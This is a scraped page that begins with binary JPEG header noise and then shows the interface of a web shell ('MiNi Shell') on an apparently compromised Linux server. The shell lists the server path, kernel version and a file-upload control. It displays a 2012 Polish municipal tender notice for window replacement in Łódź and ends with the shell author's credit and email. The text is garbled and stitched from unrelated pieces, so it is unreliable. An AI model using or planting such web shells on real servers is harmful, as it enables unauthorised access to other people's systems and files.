JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120404/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120404/77077-N-2012.html

<p class="kh_header"><b>Łódź: Wymiana stolarki okiennej w administrowanych nieruchomościach</b><br>
<b>Numer ogłoszenia: 77077 - 2012; data zamieszczenia: 04.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Górna "Wschód" , ul. Lubelska 9/11, 93-129 Łódź, woj. łódzkie, tel. 42 6847601, faks 42 6847576.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wschod.com3.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana stolarki okiennej w administrowanych nieruchomościach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: wymiana istniejącej stolarki okiennej - drewnianej     
   (typu: skrzynkowego i zespolonego) na stolarkę z PCV o podziale pionowym i 
   poziomym zgodnym z rysunkami stolarki wraz z parapetami wewnętrznymi i 
   zewnętrznymi: 
  1.1. w nieruchomościach gminnych administrowanych przez Zamawiającego oraz w 
          lokalach gminnych w budynkach Wspólnot Mieszkaniowych administrowanych 
          przez Zamawiającego o powierzchni:
      a)  wymiana okien skrzynkowych   -             44,7107 m2,
      b)  wymiana okien zespolonych   -              243,2552 m2,
      c)  wymiana parapetów wew.      -                  56,81 mb,
      d)  wymiana parapetów zew.       -                  76,36 mb.
1.2. zgodnie z dokumentacją techniczną stanowiącą załączniki do niniejszej SIWZ: 
      a)  zał. Nr 1 - wykaz adresowy stolarki okiennej do wymiany;
      b)  zał. Nr 2 - wykaz stolarki z uwzględnieniem długości listew poszerzających, ilości 
                            okien z węgarkami i powierzchni do ocieplenia; 
      c)  zał. Nr 3 - dokumentacja - rysunki nowej stolarki okiennej;
      d)  zał. Nr 4 - Specyfikacja Techniczna Wykonania i Odbioru Robót związanych z
                             wymianą stolarki okiennej.
2. W ramach zamówienia Wykonawca zobowiązany będzie do wykonania robót    
    budowlanych zgodnie z załączoną dokumentacją techniczną w zakresie:
      a) dokonania własnych pomiarów kontrolnych istniejącej stolarki okiennej w celu 
          ich uściślenia, przed zleceniem produkcji okien;
      b) przygotowania stanowiska pracy;
      c) wykucia - demontażu istniejącej stolarki okiennej drewnianej;
      d) wykucia - demontażu istniejących parapetów wewnętrznych drewnianych oraz 
          zewnętrznych blaszanych;
      e) wywozu na wysypisko materiałów z rozbiórki;
      f) dostawy wykonanej stolarki wraz z parapetami do miejsca montażu;
      g) montażu stolarki okiennej z PCV oszklonej - zgodnej z uzyskanymi pomiarami i 
           wymaganiami z zachowaniem podziału okien zgodnym z określonymi przez 
           Zamawiającego w zał. nr 3 rysunkami stolarki;
wymagania dotyczące montowanej stolarki okiennej:
 -  typ jednoramowy z profilu PCV  minimum  pięciokomorowego, o grubości profilu 
     70 mm, z pełnego surowca w  kolorze białym ( ramiaki, ościeżnice ), grubości 
     ścianek w klasie B ( 2,5 mm zewn, 1,5 mm wewn ). W przypadku ościeżnic 
     montowanych w otworach, których górna  krawędź znajduje się w linii sufitu, 
     wskazane jest zastosowanie ościeżnicy z poszerzonym górnym pasem o wys. 4 cm.;
  -  wzmocnienie ram (ościeżnic i skrzydeł ) na całej szerokości i wysokości - ze 
     stali ocynkowanej w kształcie litery U wg PN 77/BO2011;
  -  okucia obwiedniowe z systemem mikrowentylacji;
  -  funkcja skrzydeł:  rozwieralno-uchylne  i  uchylne - zgodnie z rysunkami;
  -  uszczelki czarne lub szare;
  -  szyby zespolone, termoizolacyjne, o współczynniku przenikalności cieplnej 
     K~1,0 W/m2*K; 
  -  przenikalność cieplna całego okna =1.2-1.5 W/m2*K;
  -  przenikalność akustyczna 31-33 dB;
  -  skrzydła okienne winny spełniać warunki zachowania szczelności na przenikalność 
      wody oraz prawidłowej infiltracji powietrza;
  -  każde okno i drzwi balkonowe w pomieszczeniu winno być wyposażone dodatkowo     
      w nawiewnik ( powyższa zasada obowiązuje także w przypadku gdy w jednym 
   
    pomieszczeniu montowanych jest więcej niż jedno okno jak również drzwi 
    balkonowe );
 -  ościeżnica każdego okna winna być wyposażona w profil lub listwę do montażu 
    parapetów zewnętrznych i wewnętrznych;
 -  nie dopuszcza się profili PCV z recyklingu oraz listew poszerzających łączonych;
 -  w celu zapewnienia jednolitego wyglądu stolarki, okna powinny posiadać   
     krawędzie i listwy zaokrąglone;
       
    h) montażu parapetów wewnętrznych wykonanych z PCV, komorowych w kolorze 
        białym (ewentualnie w kolorze marmurku ) o grubości min. 20 mm  z
        wykończeniami bocznymi - zgodnych  z określonymi ( w zał. nr 1 ) szer/dług 
        i uzyskanymi własnymi pomiarami;
     i) montażu parapetów zewnętrznych wykonanych z blachy ocynkowanej o 
        grubości min. 0,6 mm z odpowiednim wyprofilowaniem ( z kapinosem ) i 
         wykończeniami bocznymi - zgodnych z określonymi ( w zał. nr 1 ) szer/dług 
         i uzyskanymi własnymi pomiarami;
     j) obróbki ościeży okiennych, naprawy powstałych uszkodzeń muru w obrębie    
         otworów, a  w przypadku otworów okiennych gdzie występują ościeża z 
          węgarkami - wyrównanie ościeży płytą kartonowo - gipsową;
     k) likwidacji stanowiska pracy;
     l)  przygotowania i przekazania użytkownikowi ( Najemcy) instrukcji obsługi - 
          użytkowania zamontowanej stolarki. 
3. W ramach zamówienia Zamawiający będzie wymagał od Wykonawcy:
     a)  okresu gwarancyjnego na wykonane roboty min. 60 miesięcy; 
     b)  wykonywania robót zgodnie z zasadami bezpieczeństwa i higieny pracy 
          określonymi w Rozporządzeniu Ministra Infrastruktury z dnia 06.02.2003 r.
           ( Dz.U. z 2003 r. nr 47 poz. 401 z późn. zm.); 
      c)  odpowiedzialności za całość szkód powstałych na skutek prowadzonych robót;
      d)  zachowania praw osób trzecich, gdyż wszelkie spory z tego wynikające mogą 
           być rozstrzygane na drodze sądowej w Sądach Powszechnych; 
      e)  stosowania materiałów budowlanych posiadających atest higieniczny 
           stosowalności  w budynkach mieszkalnych, certyfikaty, oceny i aprobaty 
           techniczne;
      f)  przedstawienia następujących dokumentów do oceny i przyjęcia wykonanych 
           robót: ( zaświadczenia o jakości zastosowanych materiałów: certyfikaty, oceny 
           zgodności z normami, atesty, aprobaty techniczne );
      g)  prowadzenia robót przy udziale inspektora nadzoru wyznaczonego przez 
           Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4, 45.42.11.00-5, 45.42.11.50-0, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, określonego 
    w art. 22 ust. 1 Ustawy, który dotyczy: 
      a) posiadania wiedzy i doświadczenia;
          Wykonawcy winni udokumentować - zał. Nr 6 do SIWZ,  posiadanie 
           wiedzy i doświadczenia poprzez wykazanie wykonanych robót budowlanych w 
           okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres 
           prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim 
           rodzajem robotom budowlanym stanowiącym przedmiot zamówienia z   
           podaniem ich  wartości, przedmiotu, dat wykonania i odbiorców oraz  
           załączeniem dokumentów potwierdzających, że wykazane roboty zostały 
            wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone w 
           ilości: co najmniej jednej roboty na kwotę (brutto): min. 50.000,00 zł. 
    Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez 
    Wykonawców dokumentów na zasadzie: spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, określonego 
    w art. 22 ust. 1 Ustawy, który dotyczy:
     a) dysponowania osobami zdolnymi do wykonania zamówienia;
     Wykonawcy winni wykazać osoby, które będą uczestniczyć w wykonywaniu  
      zamówienia - zał. nr 7 do SIWZ, w szczególności odpowiedzialnych za 
      kierowanie robotami budowlanymi oraz min. trzy osoby w zawodach: murarz - 
      tynkarz, montażysta wraz z informacjami na temat ich kwalifikacji i 
      doświadczenia oraz  informacją o podstawie do dysponowania tymi osobami.  
          Wykonawca winnien oświadczyć - zał. Nr 8 do SIWZ, że Wykonawca lub 
          osoba, która będzie  uczestniczyć w wykonywaniu zamówienia pełniąca na rzecz 
          Wykonawcy obowiązki kierownika robót (usługi nadzoru nad prowadzonymi 
          robotami ) posiada, wymagane uprawnienia budowlane - zgodnie §17 ust.1 pkt 2 
          Rozporządzenia Ministra Transportu i Budownictwa w sprawie samodzielnych 
           funkcji technicznych w budownictwie ( Dz.U. z 2006 r. Nr 83 poz. 578 z późn.    
           zm.), a także posiada ważne zaświadczenie o przynależności do Okręgowej Izby    
           Inżynierów Budownictwa wraz z załączeniem do oświadczenia tych     
           dokumentów.
           Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych  
            przez Wykonawców dokumentów i oświadczeń na zasadzie: spełnia/ nie 
            spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W zakresie potwierdzenia spełnienia warunku udziału w postępowaniu, określonego 
     w art. 22 ust. 1 Ustawy, który dotyczy:
        a) sytuacji ekonomicznej i finansowej;
            Wykonawcy winni udokumentować, że posiadają opłaconą polisę 
             ubezpieczeniową lub inny dokument potwierdzający, że Wykonawca jest     
             ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
             działalności na sumę ubezpieczenia nie mniej niż 100 000,00 zł. W przypadku 
             załączenia ważności dokumentu na okres krótszy od terminu realizacji 
             przedmiotowego zamówienia, do oferty należy dołączyć pisemne 
             zobowiązanie o przedłużeniu ważności tego ubezpieczenia.      
             Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych 
             przez Wykonawców dokumentów i oświadczeń na zasadzie: spełnia/ nie 
             spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wschod.com3.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> A.N. Łódź-Górna Wschód, 93-129 Łódź, ul. Lubelska 9/11, w cenie (brutto): 20,00 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2012 godzina 10:00, miejsce: A.N. Łódź-Górna Wschód, 93-129 Łódź, ul. Lubelska 9/11, pokój nr 4..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com